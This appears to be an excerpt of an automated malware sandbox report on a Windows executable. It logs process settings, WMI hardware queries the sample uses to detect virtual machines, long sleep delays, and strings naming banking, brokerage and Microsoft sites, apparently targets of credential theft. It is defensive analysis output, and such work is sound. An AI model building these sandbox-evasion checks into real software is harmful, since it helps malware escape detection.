                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Queries memory information (via WMI often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
                        Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_PointingDevice
                        Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT EstimatedChargeRemaining, BatteryStatus FROM Win32_Battery
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Model, Size FROM Win32_DiskDrive
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL
                        Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
                        Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Default FROM Win32_Printer
                        Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3
                        Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_SoundDevice
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeMemory allocated: CF0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 596812Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 596703Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 596594Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWindow / User API: threadDelayed 3967Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWindow / User API: threadDelayed 5837Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -99890s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -99781s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -99670s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -99562s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -99453s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -99343s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -99234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -99125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -99016s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -98905s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -98791s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -98686s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -98391s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -98239s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -98121s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -98016s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -97906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -97797s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -97687s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -97578s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -97468s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -97359s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -97250s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -97140s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -97031s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -96921s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -596812s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -596703s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344Thread sleep time: -596594s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 99890Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 99781Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 99670Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 99562Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 99453Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 99343Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 99234Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 99125Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 99016Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 98905Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 98791Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 98686Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 98391Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 98239Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 98121Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 98016Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 97906Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 97797Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 97687Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 97578Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 97468Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 97359Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 97250Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 97140Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 97031Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 96921Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 596812Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 596703Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeThread delayed: delay time: 596594Jump to behavior
                        Source: Amcache.hve.19.drBinary or memory string: VMware
                        Source: zyEDYRU0jw.exeBinary or memory string: Hyper-V
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: global block list test formVMware20,11696428655
                        Source: Amcache.hve.19.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: zyEDYRU0jw.exeBinary or memory string: virtualqemu
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                        Source: Amcache.hve.19.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                        Source: Amcache.hve.19.drBinary or memory string: vmci.sys
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: AMC password management pageVMware20,11696428655
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: tasks.office.comVMware20,11696428655o
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                        Source: zyEDYRU0jw.exeBinary or memory string: IsVirtualMachine
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                        Source: Amcache.hve.19.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.19.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                        Source: Amcache.hve.19.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.19.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.19.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.19.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.19.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                        Source: zyEDYRU0jw.exeBinary or memory string: <IsVirtualMachine>b__1_0
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                        Source: Amcache.hve.19.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                        Source: Amcache.hve.19.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: discord.comVMware20,11696428655f
                        Source: Amcache.hve.19.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.19.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.19.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                        Source: Amcache.hve.19.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                        Source: Amcache.hve.19.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                        Source: Amcache.hve.19.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2249779842.0000000000E81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: outlook.office.comVMware20,11696428655s
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                        Source: Amcache.hve.19.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin`
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                        Source: Amcache.hve.19.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: tmpB110.tmp.dat.0.drBinary or memory string: dev.azure.comVMware20,11696428655j
